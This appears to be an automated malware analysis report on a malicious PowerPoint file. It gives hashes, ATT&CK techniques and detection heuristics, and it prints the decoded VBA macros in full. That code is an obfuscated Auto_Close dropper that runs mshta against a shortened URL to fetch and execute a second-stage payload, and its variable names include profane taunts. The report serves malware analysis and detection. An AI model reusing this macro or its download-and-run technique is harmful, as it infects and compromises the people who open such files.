Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 5dc9ba74b7b8bd27…

MALICIOUS

Office (OLE) / .PPT

Size: 84.0 KB
Created: 2020-08-04 21:46:59
Authoring application: Microsoft Office PowerPoint
First seen: 2026-05-13
MD5: ff161c729216430a9bcf7ff2e0bd19b4
SHA-1: 3a86dfeff7bf3aeb0da5cc123fef01ebff9762d1
SHA-256: 5dc9ba74b7b8bd27e3249b426b022e1bb924497b4549679603a5ae6403c204e9
Risk score: 108

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a PowerPoint file containing VBA macros. The Auto_Close macro triggers the execution of a function that constructs the string 'mshta ' and concatenates it with a URL, 'http:// @j.mp/asasdasdasdasdasdasddkaos'. This string is then passed to CreateObject('WScript.Shell').Exec, indicating the intent to download and execute a second-stage payload from the provided URL using mshta.exe.

Heuristics (4)

  • VBA macros detected (severity: medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call (severity: high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script: CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro (severity: low) OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script: Auto_CloSe()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1602 bytes
SHA-256: 7b809900ed7466d9dd20072424aa5b08e88724eda0a2b53a37d3f4b101e34a0b

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ab1"
Function suckmydickfornoreason11()
suckmydickfornoreason6 = "h"
suckmydickfornoreason7 = "t"
suckmydickfornoreason8 = "t"
suckmydickfornoreason9 = "p://%20%20@j.mp/asasdasddasdasdasdasdasddkaos"
antivirusarescam_6 = suckmydickfornoreason6
antivirusarescam_7 = suckmydickfornoreason7
antivirusarescam_8 = suckmydickfornoreason8
antivirusarescam_9 = suckmydickfornoreason9

suckmydickfornoreason11 = antivirusarescam_6 + antivirusarescam_7 + antivirusarescam_8 + antivirusarescam_9
End Function




Attribute VB_Name = "main"
Sub _
Auto_CloSe()
yari
End Sub

Attribute VB_Name = "ab2"
Function suckmydickfornoreason10()
suckmydickfornoreason1 = "m"
suckmydickfornoreason2 = "s"
suckmydickfornoreason3 = "h"
suckmydickfornoreason4 = "t"
suckmydickfornoreason5 = "a "
antivirusarescam_1 = suckmydickfornoreason1
antivirusarescam_2 = suckmydickfornoreason2
antivirusarescam_3 = suckmydickfornoreason3
antivirusarescam_4 = suckmydickfornoreason4
antivirusarescam_5 = suckmydickfornoreason5


suckmydickfornoreason10 = antivirusarescam_1 + antivirusarescam_2 + antivirusarescam_3 + antivirusarescam_4 + antivirusarescam_5

End Function



Attribute VB_Name = "po1"
Function hireme()
thisis = "WScr"
your = "ipt."
fucking = "She"
security = "ll"
iamhere = thisis
totellyou = your
yoursecurity = fucking
sucks = security
hireme = iamhere + totellyou + yoursecurity + sucks
End Function





Attribute VB_Name = "final"
Function yari()
CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
End Function